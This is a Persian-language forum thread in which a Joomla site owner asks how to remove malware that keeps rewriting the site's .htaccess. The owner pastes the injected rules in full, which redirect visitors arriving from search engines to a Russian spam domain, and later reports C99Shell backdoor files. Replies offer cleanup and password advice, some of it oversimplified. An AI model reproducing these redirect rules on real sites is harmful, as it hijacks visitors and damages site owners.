حذف تروجان از هاست - جوملا

[hamidsajjadieh 10]

با سلام

بنده چند ماهی هست که یه سایت راه اندازی کردم

وقتی توی گوگل یا یاهو و ... یکی از صفحات سایتو سرچ میکنم آدرسو میاره ولی وقتی روش کلیک میکنم به این آدرس دایرکت میشه :

http://confemed.ru/sunreal?9

البته آگه آدرسو دستی بزنم سایت باز میشه ولی تو موتورهای جستجو به اون آدرسی که نوشتم میره

یکم تحقیق کردم و فهمیدم که تو هاست من یه تروجان قرار گرفته به نام

BLACKLISTED:35

این اطلاعاتو از سایت معتبر www.sucuri.net گرفتم

خود این سایت هاست منو اسکن کرد و بهم گفت که این تروجان روشه

کار این تروجان به این صورته که میاد و فایل .htaccess را دستکاری میکنه و این قسمتو بهش اضافه میکنه

<IfModule mod_rewrite.c>

RewriteEngine On

RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|mail|yandex|rambler|ya|aport|linkedin|flickr|nigma|liveinternet|vkontakte|webalta|filesearch|yell|openstat|metabot|nol9|zoneru|km|gigablast|entireweb|amfibi|dmoz|yippy|search|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|cyber-content|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|web-archiv)\.(.*)

RewriteRule ^(.*)$ http://confemed.ru/sunreal?9 [R=301,L]

RewriteCond %{HTTP_REFERER} ^.*(web|websuche|witch|wolong|oekoportal|t-online|freenet|arcor|alexana|tiscali|kataweb|orange|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|telfort|hispavista|passagen|spray|eniro|telia|bluewin|sympatico|nlsearch|atsearch|klammeraffe|sharelook|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|daffodil|click4choice|exalead|findelio|gasta|gimpsy|globalsearchdirectory|hotfrog|jobrapido|kingdomseek|mojeek|searchers|simplyhired|splut|the-arena|thisisouryear|ukkey|uwe|friendsreunited|jaan|qp|rtl|search-belgium|apollo7|bricabrac|findloo|kobala|limier|express|bestireland|browseireland|finditireland|iesearch|ireland-information|kompass|startsiden|confex|finnalle|gulesider|keyweb|finnfirma|kvasir|savio|sol|startsiden|allpages|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|goo|westaustraliaonline)\.(.*)

RewriteRule ^(.*)$ http://confemed.ru/sunreal?9 [R=301,L]

</IfModule>

این کار باعث میشه که موتورهای جستجو سایت منو به آدرس http://confemed.ru/sunreal?9 ریدایرکت کنند

حتی اگه باز من این فایلو تصحیح کنم بعد از حدود 20 دقیقه دوباره این قسمت به فایل اضافه میشه

سوالم اینه که :

1- با وجودی که کن پرمیشن این فایلو روی 444 تنظیم کردم چطور میتونه اونو تغییر بده؟

2- چطوری میشه این تروجانو حذف کنم؟

از بزرگان و اساتید محترم میخوام که جوابگو باشند

خیلی خیلی متشکرم

ویرایش شده در اردیبهشت 91 توسط hamidsajjadieh

[it-net 13]

خوب برای این کار شما باید درون هاست خود رو جستجو کنید بخصوص درون فایلهای index و Defult که ببینید سورس اضافه در ونشون اضافه نشده.

که بهترین راهش اینه که رویه سیستم خود کسپر اسکای نصب کنید و هاستتون رو دانلود کنید و با آنتی ویروس هم چک کنید که بعد از پاکسازی به مدیر سرور بگین تا کل هاست شما رو حذف و دوباره ایجاد نماید تا اگر در روت هاست دستورات شل وجود داشته باشه حذف بشه.

در آخر بصورت دستی ریستوری نمایید.

[hamidsajjadieh 10]

خوب برای این کار شما باید درون هاست خود رو جستجو کنید بخصوص درون فایلهای index و Defult که ببینید سورس اضافه در ونشون اضافه نشده.

که بهترین راهش اینه که رویه سیستم خود کسپر اسکای نصب کنید و هاستتون رو دانلود کنید و با آنتی ویروس هم چک کنید که بعد از پاکسازی به مدیر سرور بگین تا کل هاست شما رو حذف و دوباره ایجاد نماید تا اگر در روت هاست دستورات شل وجود داشته باشه حذف بشه.

در آخر بصورت دستی ریستوری نمایید.

دوست عزیز آیا آنتی ویروس میتونه در بین کدهای پی اچ پی تروجان رو پیدا و اونو حذف کنه؟

آیا روشی که شما گفته اید در عمل جواب میده؟

[it-net 13]

بله

کسپر اسکای درون تمام فایلها رو نگاه می کنه و در صورتی که نتونه حذف کنه اون فایل رو خطا میگیره و شما با ادیت کردن می تونید مشکل رو برطرف کنید.

مثلا الان سایتهایی که شل دارن رو با کسپر باز کنید می بینید خطا میده و اجازه باز شدن سایت رو نمیده و اسم شل رو بهتون میده که از چه نوعی هست و چکار می کنه.

این مشکل تنها یک راه داره که وارد سایت میشه:

ویروسی بودن سیستم

پس همیشه از سیستم خودتون اطمینان پیدا کنید بعد به آپدیت سایت بپردازید

[hamidsajjadieh 10]

بله

کسپر اسکای درون تمام فایلها رو نگاه می کنه و در صورتی که نتونه حذف کنه اون فایل رو خطا میگیره و شما با ادیت کردن می تونید مشکل رو برطرف کنید.

مثلا الان سایتهایی که شل دارن رو با کسپر باز کنید می بینید خطا میده و اجازه باز شدن سایت رو نمیده و اسم شل رو بهتون میده که از چه نوعی هست و چکار می کنه.

این مشکل تنها یک راه داره که وارد سایت میشه:

ویروسی بودن سیستم

پس همیشه از سیستم خودتون اطمینان پیدا کنید بعد به آپدیت سایت بپردازید

ممنون ازتون

من یه بک آپ میگیرم و اونو دانلود میکنم و بعدش با کسپر چک میکنم ببینم چه اتفاقی میافتد

نتیجه را در همین جا اعلام میکنم تا اگه کسی به این مشکل دچار شد بدونه که چکار کنه

از همه شما دوستان ممنون

[hamidsajjadieh 10]

دوستان من از هاستم بک آپ گرفتم و اونو با کسپر اسکن کردم . 3 تا مورد پیدا کرد به نام Backdoor.PHP.C99Shell.cn که در Public_html/tmp/mod_spo654654654/air.php و Public_html/tmp/mod_spo654654654/air.txt1 و Public_html/tmp/mod_spo654654654/air.txt2 قرار دارند . ولی ظاهرا آنتی ویروس من نتونتس پاکسازی کنه.

حالا به نظر شما من برم توی هاست و کلا هر چی تو فولدر tmp هست رو پاک کنم؟

یا بگردم با یه آنتی ویروس بروز فایل بک آپ رو اسکن و پاکسازی و در آخر اونو تو هاست آپلود کنم و دوباره نصب کنم؟

[hamidsajjadieh 10]

دوستان عزیز

خواهش میکنم همه توجه کنید

ماژول simple page option یه ماژولی است که آلوده به تروجانه

از بزرگان این سایت خواهش دارم که در این مورد تحقیق کنند و نتیجه را به همه اعلام کنند تا کسی با مشکلی شبیه به من مواجه نشه

در ضمن این ماژول ایمیلهای جعلی زیادی را در غیاب شما در سراسر اینترنت پخش میکنه .

از همه شماها ممنونم

[hamidsajjadieh 10]

من پوشه tmp را حذف کردم . به نظر مشکل حل شده و تا الان که سایت داره به درستی کار میکنه

متشکرم

[shamimi 15]

دوست عزیز این ویروسی که گرفتید سه دلیل معمولا دارد

1- پسورد ادمین شما بسیار راحت است که توانسته اند هک کنند و سپس از مدیریت شل آپلود کنند

2-اگر سیستمی از پرتال جوملا استفاده می کنید اگر افزونه ای رایگان دریافت می کنید مطمئن شوید که افزونه شل ندارد

3- هاستینگ و سرور ضعیفی دارید که پیشنهاد می شود اگر اینگونه است تغییر سرویس دهید..

موفق باشیدgift

[it-net 13]

دوست من شما فایلهای index.htm و index.php رو هم ویرایش کنید و ببینید دستورات ناشناسی توشون نیست.

سعی کنید کلمه عبور رو تلفیقی از عدد و حروف و علائم بدین و رویه پوشه ادمین پسورد بزارین.

[it-net 13]

دوست من شما فایلهای index.htm و index.php رو هم ویرایش کنید و ببینید دستورات ناشناسی توشون نیست.

سعی کنید کلمه عبور رو تلفیقی از عدد و حروف و علائم بدین و رویه پوشه ادمین پسورد بزارین.

[hamidsajjadieh 10]

حتما همه این کارهایی را که گفتید انجام میدهم

متشکرم